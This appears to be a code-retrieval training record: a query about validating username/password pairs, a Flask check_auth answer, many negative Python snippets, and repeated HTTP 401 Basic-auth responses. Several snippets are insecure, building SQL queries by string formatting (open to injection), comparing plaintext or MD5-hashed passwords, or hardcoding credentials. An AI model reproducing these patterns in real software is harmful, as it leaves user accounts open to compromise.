test_seeds=None, cuda=False, log=False, render=False, max_actions=10000):\n net.eval()\n total_reward = 0\n with torch.no_grad():\n for ep in range(total_episodes):\n obs = env.reset()\n done, ep_reward, ep_actions = False, 0, []\n hx = Variable(net.init_hidden())\n all_obs = [obs]\n action_count = 0\n while not done:\n if render:\n env.render()\n obs = Variable(torch.Tensor(obs)).unsqueeze(0)\n if cuda:\n obs, hx = obs.cuda(), hx.cuda()\n critic, logit, hx = net((obs, hx))\n prob = F.softmax(logit, dim=1)\n action = int(prob.max(1)[1].data.cpu().numpy())\n obs, reward, done, _ = env.step(action)\n action_count += 1\n done = done if action_count <= max_actions else True\n ep_actions.append(action)\n # A quick hack to prevent the agent from stucking\n max_same_action = 5000\n if action_count > max_same_action:\n actions_to_consider = ep_actions[-max_same_action:]\n if actions_to_consider.count(actions_to_consider[0]) == max_same_action:\n done = True\n ep_reward += reward\n if not done:\n all_obs.append(obs)\n total_reward += ep_reward\n if log:\n logger.info('Episode =>{} Score=> {} Actions=> {} ActionCount=> {}'.format(ep, ep_reward, ep_actions,\n action_count))\n return total_reward / total_episodes", "def main():\n global repeat\n regime = collect()\n start = int(raw_input(\"Which line of the exercise script would you like to begin with? \")) - 1\n regime = regime[start:]\n say(\"Ready?\")\n time.sleep(1)\n for exercise in regime:\n coach(exercise[:-1])\n while repeat:\n repeat = False\n coach(exercise[:-1])\n say(\"Session complete.\")", "def testOneShow(self):\n\t\t# for line in self.file:\n\t\t# \tprint line\n\t\tline = self.file.readline()\n\t\tinfo = scrapeFilename( line )\n\t\tassert info['show'] == \"Chuck\"" ]
[ "0.6574454", "0.64675266", "0.6428111", "0.6335772", "0.6264014", "0.6199133", "0.6197816", "0.6196485", "0.6193701", "0.6170308", "0.6169579", "0.61569935", "0.61476463", "0.60803", "0.6072124", "0.60470563", "0.6037859", "0.6029739", "0.60170627", "0.60096955", "0.59748065", "0.59707355", "0.5963511", "0.59322083", "0.59228396", "0.5851858", "0.58473396", "0.5810563", "0.57973063", "0.578185", "0.57710165", "0.57710165", "0.5756667", "0.5745298", "0.5743211", "0.57393086", "0.5732825", "0.5720216", "0.5720091", "0.5709835", "0.5686379", "0.5680427", "0.56635785", "0.5652328", "0.5649652", "0.5646747", "0.5639988", "0.5622973", "0.56028414", "0.56004894", "0.55840844", "0.55737025", "0.55662376", "0.5563632", "0.55522877", "0.5519451", "0.5503489", "0.5495842", "0.54956967", "0.549453", "0.549453", "0.54773414", "0.54767877", "0.54634607", "0.545317", "0.5449681", "0.54422206", "0.5441044", "0.54401726", "0.5436172", "0.5429962", "0.54276985", "0.54268545", "0.5407996", "0.53915906", "0.5387836", "0.5382639", "0.5381958", "0.5375536", "0.53732413", "0.53729206", "0.5360793", "0.53601396", "0.5357626", "0.5356289", "0.534783", "0.53447163", "0.53445154", "0.53328073", "0.5324535", "0.53142214", "0.5312247", "0.5303467", "0.53029424", "0.5299989", "0.5298545", "0.5298279", "0.52856714", "0.5283042", "0.5282711", "0.52821326" ]
0.0
-1
This function is called to check if a username / password combination is valid.
def check_auth(username, password): return (username == app.config['USERNAME'] and password == app.config['PASSWORD'])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def check_auth(username, password, expected_user, expected_pw):\n return username == expected_user and password == expected_pw", "def validate_authentication(self, username, password):\n return self.user_table[username]['pwd'] == password", "def check_auth(username, password):\n return username == USERNAME and password == PASSWORD", "def check_valid(self, username, password):\n con = self.connect()\n cursor = con.cursor()\n cursor.execute(\"SELECT username,password \\\n FROM users WHERE username = %s\", (username,))\n credentials = cursor.fetchone()\n cursor.close()\n con.commit()\n con.close()\n if credentials is None:\n return False\n if username != credentials[0]:\n return False\n if sha256_crypt.verify(password, credentials[1]):\n return True\n return False", "def check_auth(username, password):\n return username == 'aweber' and password == 'aweber1100'", "def check_auth(username, password):\n return username == 'nicholas' and password == ADMIN_PASS", "def check_auth(username, password):\n return username == 'admin' and password == 'worcester'", "def validate_login(self, username, password):\n user = User(self).get(username)\n return user and user['Password'] == password", "def check_auth(username, password):\n return username == 'admin' and password == 'pebble'", "def check_auth(username, password):\n return username == 'jeffkoons' and password == 'likesweirdbaloons'", "def check_auth(username, password):\n return username == 'admin' and password == 'Passw0rd'", "def check_auth(username, password):\n return username == 'asimov' and password == 'tagada72'", "def check_auth(username, password):\n return username == 'sammy' and password == 'BasicPassword!'", "def is_valid_password(password, username):\n import string\n if len(password) < 4 or ' ' in password:\n return False\n if username:\n if string.lower(username) in string.lower(password):\n return False\n return True", "def check_auth_password(self, username, password):\n return AUTH_FAILED", "def check_auth(username, password):\n return username == app.config['USERNAME'] and (\n password == app.config['PASSWORD'])", "def check_auth(username, password):\n return username == 'admin' and password == 'password'", "def _credentials_are_valid(self, username, password):\n LDAP_SERVER = 'ldap://xxx.xxx.xxx' # EDIT THIS\n LDAP_USERNAME = '%s@xxx.com' % username # EDIT THIS\n LDAP_PASSWORD = password\n\n try:\n # build a client\n ldap_client = ldap.initialize(LDAP_SERVER)\n # perform a synchronous bind\n ldap_client.set_option(ldap.OPT_REFERRALS, 0)\n ldap_client.simple_bind_s(LDAP_USERNAME, LDAP_PASSWORD)\n except ldap.INVALID_CREDENTIALS:\n ldap_client.unbind()\n # Wrong username or password\n return False\n except ldap.SERVER_DOWN:\n # AD server not available\n return False\n # all is well\n ldap_client.unbind()\n # Login successful\n return True", "def username_is_valid(username):\n\n if len(username) < MINIMUM_PASSWORD_LENGTH:\n return False\n else:\n return True", "def check_auth(username, password):\n return username == c.id and password == c.pw", "def check_auth(username, password):\n return username == 'admin' and password == 'root'", "def check_auth(username, password):\n return username == 'admin' and password == 'secret'", "def check_auth(username, password):\n return username == 'admin' and password == 'secret'", "def password_validator(username, password):\n digits = re.search(r'\\d+', password)\n capital_letters = re.search(r'[A-Z]+', password)\n lenght = len(password) > PASSWORD_MIN_LENGTH\n special_symbol = re.search(r'[\\-\\/\\@\\?\\!\\,\\.\\#\\&\\*]+', password)\n\n statement = digits and capital_letters and lenght and special_symbol\n\n if statement:\n return True\n return False", "def check_auth(username, password):\n return username == 'admin' and password == 'admin'", "def check_auth(username, password):\n ADMIN_USER = config.CONFIG_VARS['ADMIN_USER']\n ADMIN_PASS = config.CONFIG_VARS['ADMIN_PASS']\n return username == ADMIN_USER and password == ADMIN_PASS", "def check_auth(username, password):\n # return username == app.config['USER'] and password == app.config['PASS']\n\n return username == app.config['USER'] and password == app.config['PASS']", "def check_auth(username, password):\r\n return username == current_app.config['ADMIN_USERNAME'] \\\r\n and password == current_app.config['ADMIN_PASSWORD']", "def check_credentials(username, password):\n if not validate_username(username) or not validate_password(password):\n return False\n sql = \"SELECT password \" \\\n \"FROM users \" \\\n \"WHERE username=:username AND is_active=TRUE\"\n result = db.session.execute(sql, {\"username\": username})\n user = result.fetchone()\n if user is None:\n return False\n password_hash = user[0]\n if check_password_hash(password_hash, password):\n return True\n return False", "def is_logged_in_user_valid(user_name, password):\n if user_name.upper() == \"HELLO\" and password == \"World\":\n return True # User input matches user name and password.\n else:\n return False # User input does not match user name and password.s", "def check_auth(username, password):\n\n config = get_app_configurations()\n\n with open(config[\"credentials\"], \"r\") as fh:\n u, p = fh.readline().rstrip().split(\",\")\n\n return username == u and password == p", "def verify_pw(username, password):\n credentials = HtpasswdFile(app.config[\"CREDENTIAL_FILE\"])\n if not credentials.check_password(username, password):\n logging.warning(\"%s tried to login with wrong password\", username)\n return False\n return True", "def check_auth(username, password):\n return password == os.getenv('PASSWORD')", "def validate_user(self, username, password, client, request, *args, **kwargs):\n log.debug('Validating username %r and its password', username)\n if self._usergetter is not None:\n user = self._usergetter(username, password, client, request, *args, **kwargs)\n if user:\n log.debug('Successfully validated username %r', username)\n request.user = user\n return True\n return False\n log.debug('Password credential authorization is disabled.')\n return False", "def _validate_password_works_with_username(password, username=None):\n if password == username:\n raise errors.AccountPasswordInvalid(accounts.PASSWORD_CANT_EQUAL_USERNAME_MSG) # lint-amnesty, pylint: disable=no-member", "def check_auth(username, password):\n return username == os.environ['USERNAME'] and password == os.environ['PASSWORD']", "def is_valid_login(self, username, password):\n\t\treturn self._send_command_to_entity_server(us.SERVER_COMMAND_IS_LOGIN_INFORMATION_VALID, username + '|' + password)", "def authenticate(self):\n rv = Form.validate(self)\n if not rv:\n return False\n\n user = self.username.data\n\n cur = get_cursor()\n if email_exists(cur, user):\n user = get_username(cur, user)\n\n if username_exists(cur, user):\n pw_hash = get_pw_hash(cur, user)\n\n if check_password(self.password.data, pw_hash):\n self.username.data = user\n return True\n\n return False", "def is_valid_user(self, username, password): # WORKS\n done1 = self.cur.execute(\"SELECT password FROM users WHERE username=\\\"{}\\\"\".format(username))\n done2 = self.cur.execute(\"SELECT username FROM admins WHERE username=\\\"{}\\\"\".format(username))\n if done1 == 0 and done2 == 0: # If both queries are unsuccessful, username doesn't exist in both tables.\n return False\n else:\n if done1 == 1: # If username exists in USERS table.\n self.cur.execute(\"SELECT password FROM users WHERE username=\\\"{}\\\"\".format(username))\n stored_password = self.cur.fetchone()[0]\n return check_password_hash(stored_password, password) # Returns True if the hashes match.\n else: # If username exists in ADMINS table.\n self.cur.execute(\"SELECT password FROM admins WHERE username=\\\"{}\\\"\".format(username))\n stored_password = self.cur.fetchone()[0]\n return check_password_hash(stored_password, password) # Returns True if the hashes match.", "def check_user(self,username, password):\n safe_input = (username, password)\n vals = self.cur.execute(\"SELECT Username, Password FROM Users WHERE Username=? AND Password=?\",safe_input).fetchone()\n if vals:\n logging.info('%s was authenticated', username)\n return True\n else:\n logging.info('Failed login for %s', username)\n return False", "def valid_login(username, password):\n db = get_db()\n db.ping(True)\n cur = db.cursor()\n\n try:\n sql = \"SELECT password FROM users WHERE user_name = '{}';\".format(username)\n cur.execute(sql)\n for i in cur:\n return check_password_hash(i[0], password)\n return False\n except mysql.connector.Error as err:\n flash(err, \"set\")\n return False\n finally:\n cur.close()\n db.close()", "def check_credentials(self, username, password):\n user = None\n if username != \"\":\n # Calling DB and fetching userdetails\n user = userdetails_API_query(username)\n print \"id \", user['_id']\n if user != None:\n #u = app.config['BASIC_AUTH_USERNAME'] = user['username']\n #pwd = app.config['BASIC_AUTH_PASSWORD'] = user['pw_hash']\n # print \" u & pwd\",username\n if user['username'] == username and check_password_hash(user['pw_hash'], password):\n g.user = user['_id'], username, user['email']\n return True\n print \"g.user\", g.user\n return False", "def test_credentials(self):\r\n data = self._deep_clean('zekebarge@gmail.com')\r\n error = data.get(ERROR_CODE, None)\r\n if error in (1,2):\r\n raise InvalidCredentialsError(\"Credentials are invalid for user '{}'\".format(self._username))\r\n return True", "def check_auth(username, password):\n return get_ct_object(username, password) is not None", "def check_user(self):\n try:\n if (self.get_user()[0][0] == self.username) and (self.check_password(self.password)):\n return True\n else:\n return False\n except:\n return False", "def check_auth(username, password):\n return username == 'daniel' and password == config['redis_auth_key']", "def validate_authentication(self, username, password, handler):\n hash = md5(password).hexdigest()\n msg = \"Authentication failed.\"\n if not self.has_user(username):\n if username == 'anonymous':\n msg = \"Anonymous access not allowed.\"\n raise AuthenticationFailed(msg)\n if username != 'anonymous':\n if self.user_table[username]['pwd'] != hash:\n raise AuthenticationFailed(msg)", "def is_correct_user(self, login, password):\n pass", "def check_auth(username, password):\n return username == get_env('UPLOAD_USER') and password == get_env('UPLOAD_PASSWORD')", "def verify_password(self, username, password):\n\n try:\n self.c.execute('SELECT password FROM profiles WHERE name=(?)', (username,))\n\n db_pw = self.c.fetchone()[0]\n print(password)\n\n return db_pw == password\n\n except TypeError:\n return False", "def check_credentials(username, password):\n\n return db.auth_user(username, password)", "def check_auth(_, http_password):\n return (password is not None) and (password == http_password)", "def check_user(self, username, password):\n user = [user for user in self.db if user['username'] == username]\n if user:\n if check_password_hash(user[0][\"password\"], password):\n return True\n return False\n return False", "def validate(self) -> bool:\n if not super().validate():\n return False\n\n # Does the user exist\n user = User.query.filter_by(username=self.username.data).first()\n if not user:\n self.username.errors.append('Invalid username or password')\n return False\n\n # Does given password match user's password\n if not user.check_password(self.password.data):\n self.username.errors.append('Invalid username or password')\n return False\n\n return True", "def check_credentials(username, password):\n\t\n\tconn = sqlite3.connect('db/user_task.db')\n\tcursor = conn.execute(\"SELECT password from user WHERE username == \\'%s\\'\" % (username))\n\tdata = cursor.fetchall()\n\tconn.close()\n\n\tif len(data) == 0:\n\t\treturn u\"Incorrect username\"\n\n\tfor row in data:\n\t\tencoded_password = hashlib.sha1(password.encode('utf-8')).hexdigest()\n\t\tif row[0] == encoded_password:\n\t\t\treturn None\n\n\treturn u\"Incorrect password\"\n\t\n\t# An example implementation which uses an ORM could be:\n\t# u = User.get(username)\n\t# if u is None:\n\t# return u\"Username %s is unknown to me.\" % username\n\t# if u.password != md5.new(password).hexdigest():\n\t# return u\"Incorrect password\"", "def check_auth(username, password):\n try:\n locust_username = os.environ['LOCUST_USER_NAME']\n locust_password = os.environ['LOCUST_PASSWORD']\n return username == locust_username and password == locust_password\n except:\n return True", "def validate_password(data):\n\n if \"password\" not in data:\n return False\n password = data[\"password\"]\n if len(password) < 4 or len(password) > 16:\n return False\n\n return True", "def _check_user_pass(self):\n if not self.username:\n self.username = input(' 请输入手机号:')\n if self.username.isdigit() and '+86' not in self.username:\n self.username = '+86' + self.username\n\n if not self.password:\n self.password = input(' 请输入密码:')", "def check_password(self, username, password): # tested\r\n conn = self.get_db()\r\n with conn:\r\n c = conn.cursor()\r\n sql = ('select password from gameuser where username=%s')\r\n c.execute(sql,(username,))\r\n hashedpass = md5.new(password).hexdigest()\r\n u = c.fetchone()\r\n if u == None:\r\n raise NoUserExistsException(username)\r\n # print 'database contains {}, entered password was {}'.format(u[0],hashedpass)\r\n return u[0] == hashedpass", "def valid_login_password(username, password, pw_hash):\n salt = pw_hash.split(',')[1]\n return pw_hash == make_pw_hash(username, password, salt)", "def check_auth(username, password):\n return username == 'admin' and password in app.config[\"CLAIM_SECRETS\"]", "def validate_password(self, field):\n username = self.username.data\n if platform.system().lower() == 'linux':\n g.logger.debug('use pam for authenticate.')\n from pam import authenticate\n if authenticate(username, field.data):\n g.logger.info('session opened for user %s.' % username)\n return username\n else:\n raise ValueError('Authentication failure.')\n return username", "def check_credentials_typo(credentials):\n regex_username = r'^[\\w\\.\\-]{2,}$'\n regex_password = r'[^.]{4,10}$'\n\n if not match(regex_username, credentials['username']):\n raise ValueError('invalid username typo')\n\n if not match(regex_password, credentials['password']):\n raise ValueError('invalid password typo')", "def username_and_password_check(username: str, password: str) -> bool:\n table = metadata.tables['users']\n s = select(\n [\n func.count(table.c.id)\n ]).where(tuple_(table.c['username'], table.c['password'])\n .in_([(username, password)]))\n result = conn.execute(s).scalar()\n return bool(result)", "def check_auth(username, password):\n user = User.query.filter(User.username == username).first()\n\n if user:\n return user.password == password\n else:\n return False", "def verify_password(username, password):\n if username in user_auth and check_password_hash(user_auth.get(username), password):\n return username", "def authentication_validation(username, password, access_token):\n if bool(username) is not bool(password):\n raise Exception(\"Basic authentication requires a username AND\" \" password.\")\n if (username and access_token) or (password and access_token):\n raise Exception(\n \"Cannot use both Basic Authentication and\"\n \" OAuth2.0. Please use only one authentication\"\n \" method.\"\n )", "def invalid_credentials( form , field ): \n\tusername_entered = form.username.data\n\tpassword_entered = field.data \n\tuser_object = User.query.filter_by(username = username_entered).first()\n\tif user_object is None : \n\t\traise ValidationError(\"Username or Password is incorrect !\")\n\telif not pbkdf2_sha256.verify(password_entered , user_object.password) : \n\t\traise ValidationError(\"Username or Password is incorrect !\")", "def is_password_valid(password):\n #TODO : This should also be handled by the front_end\n pass", "def check_password(username, password, htpasswd_fn):\n entries = parse_htpasswd(htpasswd_fn, username)\n if not entries.has_key(username):\n raise NoSuchUser('No user: %r' % username)\n return check_entry_password(\n username, password, entries[username])", "def auth(username, password):\n return username == password", "def _check_password(self, password):\n if self.password_regex.search(password) is not None:\n print(\"Correct password\")\n return True\n else:\n print(\"Wrong password\")\n return False", "def check_auth(username, password):\n return username == current_app.config['DOC_USERNAME'] and password == current_app.config['DOC_PASSWORD']", "def _check_username(self, username):\n if self.username_regex.search(username) is not None:\n print(\"Correct username\")\n return True\n else: \n print(\"Wrong username\")\n return False", "def check_auth_password(self, username, password):\n if username == self.username and password == self.password:\n return paramiko.AUTH_SUCCESSFUL\n return paramiko.AUTH_FAILED", "def check_credentials(input_password, real_password):\n return pwd_context.verify(input_password, real_password)", "def test_valid_username_invalid_password(self):\n response = self.client.post(reverse('users:login'), {'username': self.user['username'], 'password': '1sfsdf'})\n self.assertEqual(response.status_code, 200)\n self.assertFormError(response, 'form', None, ERROR_MSG)", "def authorise_login(self, username, password):\n con = self.connect()\n cursor = con.cursor()\n cursor.execute(\"SELECT username,password \\\n FROM users WHERE password = %s\", (password,))\n credentials = cursor.fetchone()\n cursor.close()\n con.commit()\n con.close()\n if credentials is None:\n return False\n if username != credentials[0]:\n return False\n if password != credentials[1]:\n return False\n return True", "def clean(self):\n cleaned_data = super().clean()\n username = cleaned_data['username']\n password = cleaned_data['password']\n\n if authenticate(username=username, password=password) is None:\n raise ValidationError('Your username or password is incorrect.')", "def _check_password(self, password):\n rule = re.compile(constant.password_regex)\n if not rule.match(password):\n return False\n # disallow password from azure guide, yes, it's hard code.\n disallowed = constant.password_disallowed\n return password not in disallowed", "def validate(username: str, password: str) -> dict:\n validation_check = {}\n \n # Check to see if the username was left blank\n if username.strip() == \"\":\n validation_check[\"success\"] = False\n validation_check[\"username\"] = \"Username cannot be left blank.\"\n\n # Check to see if the username is taken\n elif not sql.is_username_taken(username):\n validation_check[\"success\"] = False\n validation_check[\"username\"] = \"Username is incorrect\"\n\n # Check to see if the password was left blank\n if password.strip() == \"\":\n validation_check[\"success\"] = False\n validation_check[\"password\"] = \"Password cannot be left blank.\"\n\n\n if not validation_check.get(\"success\", True):\n return validation_check\n\n else:\n return sql.verify_credentials(username, password)", "def check_friend(self, username):\n if (self.isBlank(username) or self.isValidLen(username)):\n return False\n\n safe_input = (username,)\n \n vals = self.cur.execute(\"SELECT Username, Password FROM Users WHERE Username=?\" ,safe_input).fetchone()\n if vals:\n return True\n else:\n return False", "def test_check_password():\n assert check_password('Longpassword') == False\n assert check_password('123456') == False\n assert check_password('short') == False\n assert check_password('C0rect') == False\n assert check_password('Correct8') == True", "def check_password(self, password):\n return self.password == password", "def test_validate_credentials(self):\n pass", "def check_my_users(user):\n user_data = my_users.get(user['username'])\n if not user_data:\n return False # <--- invalid credentials\n elif user_data.get('password') == user['password']:\n return True # <--- user is logged in!\n\n return False # <--- invalid credentials", "def valid_login(username: str, password: str):\n\n try:\n LoginHandler.login(username, password)\n global validLogin\n validLogin = True\n except:\n validLogin = False", "def checkLogin(username, password):\n\n # Query database for username\n cur = initialise(2)\n cur.execute(\"SELECT * FROM users WHERE username = ?\", [username])\n users = cur.fetchall()\n\n # Ensure username exists and password is correct\n if len(users) != 1 or not check_password_hash(users[0][\"hash\"], password):\n return False, username\n else:\n return True, users[0][\"id\"]", "def validate_login(name,password):\n\t\n\t#Read the attendance excelsheet check if username and password matched\n\tdf_atten=pd.read_csv(\"datasrc/People.csv\")\n\t# 10006 ultbjxu\n\t\n\tif (df_atten.Username.astype(str).str.contains(name).any() and df_atten.Password.astype(str).str.contains(password).any()):\t\t\n\t\treturn True\n\telse: \n\t\treturn False", "def isUSER(username, password):\n usr = UserData[\"username\"].to_dict()\n listofUsers = list(UserData[\"username\"])\n if username in listofUsers:\n # print('Is a User')\n getindex = listofUsers.index(username)\n listofPasswords = list(UserData[\"password\"])\n # print(getindex)\n if listofPasswords[getindex] == password:\n # print('Password Correct')\n return True, True\n return True, False\n return False, False", "def _input(self):\n\t\tself.username = input(\"Username:\")\n\t\tself.password = input(\"password:\")\n\t\tret = re.match(r\"^\\w{1,20}$\", self.username)\n\t\tprint(\"------>input string\", self.username)\n\t\tprint(\"------>matched string\",ret)\t\n\t\ttime.sleep(1)\n\t\tif ret == None:\n\t\t\treturn True\n\t\telse:\n\t\t\tpass\n\n\t\tsql = f\"\"\"select name, password from users where name='{self.username}';\"\"\"\n\t\tprint(\"----------->\", sql)\n\t\ttime.sleep(1)\n\t\tcount = self.cs.execute(sql)\n\t\tprint(count)\n\t\tif (self.username, self.password) == self.cs.fetchone():\n\t\t\tprint(\"Login Successfully\")\n\t\t\ttime.sleep(1)\n\t\t\treturn False\n\t\telse:\n\t\t\tprint(\"Wrong username or password\")\n\t\t\ttime.sleep(1)\n\t\t\treturn True", "def is_valid_login(username, password):\n with open(PASSFILE, \"r\") as passfile:\n for record in passfile:\n try:\n valid_user, valid_password = False, False\n r_username, r_salt_hash = record.split()\n if username == r_username:\n valid_user = True\n if sha256_crypt.verify(password, r_salt_hash):\n valid_password = True\n if valid_user and valid_password:\n return True\n except ValueError:\n pass\n return False", "def check_auth(username, password):\n session.pop('username', None)\n session.pop('password', None)\n session['username'] = username\n session['password'] = password\n # Test if we can connect to a region\n connect_to_region()\n return True", "def check_credentials_validation(credentials):\n spec = {'_id': credentials['username'], 'password': credentials['password']}\n if not current_app.mongo.observer.users.find_one(spec):\n raise Unauthorized('invalid credentials')", "def username_check(username):\n\n try: \n pwd.getpwnam(username)\n print(\"User %s DOES EXIST. Try a different username.\" % (username)) \n return False\n\n except KeyError: \n print(\"User %s DOES NOT exist. Continuing...\" % (username)) \n return True", "def test_invalid_username_valid_password(self):\n response = self.client.post(reverse('users:login'), {'username': 'xyzabe', 'password': self.user['password1']})\n self.assertEqual(response.status_code, 200)\n self.assertFormError(response, 'form', None, ERROR_MSG)", "def test_valid_password(self):\n pass_field = Field(\"\".join(['x' * (int(self.app.config['MAX_PWD_LEN']))]))\n\n valid_password(None, pass_field)", "def authenticate(username, password):\n test = User.load(username)\n test_password = test.password\n input_password = md5.new(\n password + config.get('security', 'salt')).digest()\n if input_password == test_password:\n return True\n else:\n return False", "def test_authenticate_invalid_username(self):\r\n print(\"Authenticate user invalid username\")\r\n username = \"test9999user\"\r\n password = \"password\"\r\n\r\n self.assertEqual(self.system.authenticate(username, password), False)", "def verify_pw(username, password):\n global password_store\n logger = logging.getLogger('verify_pw')\n if not password_store:\n logger.error(\"No password store specified\")\n return False\n logger.debug(\"Verifying password for %s\" % username)\n return password_store.verify(username, password)" ]
[ "0.82211864", "0.8146436", "0.7975914", "0.7962432", "0.7885527", "0.78588223", "0.78382313", "0.78288996", "0.7815222", "0.7798579", "0.77856815", "0.77700555", "0.7760794", "0.7754975", "0.77548647", "0.7750886", "0.7749223", "0.77322245", "0.7715806", "0.7685904", "0.7673684", "0.766307", "0.766307", "0.76620096", "0.76567376", "0.7652723", "0.765255", "0.7611541", "0.75952524", "0.7564781", "0.7557824", "0.7547461", "0.75408834", "0.75314397", "0.7506924", "0.75042623", "0.74691737", "0.7442317", "0.741009", "0.740618", "0.73972464", "0.7394501", "0.7389306", "0.73495054", "0.7336364", "0.7299509", "0.7276375", "0.7247304", "0.7230579", "0.7205749", "0.7199119", "0.71977973", "0.7193516", "0.71885014", "0.71854734", "0.71695465", "0.7169254", "0.7159132", "0.7140503", "0.7135009", "0.71116257", "0.7110569", "0.7108786", "0.709969", "0.7093436", "0.7031712", "0.7030077", "0.7026029", "0.7025823", "0.69905216", "0.6989299", "0.69882464", "0.69840413", "0.696945", "0.69658744", "0.69613117", "0.6940676", "0.6931497", "0.6914118", "0.6901826", "0.68954366", "0.68901163", "0.68864787", "0.6883074", "0.68827283", "0.68799317", "0.68769723", "0.68669415", "0.6864661", "0.68634623", "0.68553925", "0.6848534", "0.6846545", "0.6840525", "0.6836461", "0.6829205", "0.6827091", "0.682658", "0.68223697", "0.6813599" ]
0.7687129
19
Sends a 401 response that enables basic auth
def authenticate(): return Response(render_template('index.html', auth=False), 401, {'WWW-Authenticate': 'Basic realm="Login Required"'})
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def authenticate():\n return Response('Not Authorized', 401, {'WWW-Authenticate': 'Basic realm=\"api\"'})", "def authenticate():\n return Response(\n '', 401, {'WWW-Authenticate': 'Basic realm=\"Login Required\"'}\n )", "def authenticate():\n return Response(\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate(self):\n abort(\n 401,\n description=self.exception,\n www_authenticate=(\"WWW-Authenticate\", 'Basic realm=\"%s\"' % __package__),\n )", "def authenticate():\n return Response(\n 'Could not verify your credentials for that url', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\r\n return Response(\r\n 'Could not verify your access level for that URL.\\n'\r\n 'You have to login with proper credentials', 401,\r\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n\treturn Response(\n\t'Could not verify your access level for that URL.\\n'\n\t'You have to login with proper credentials', 401,\n\t{'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials.', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic 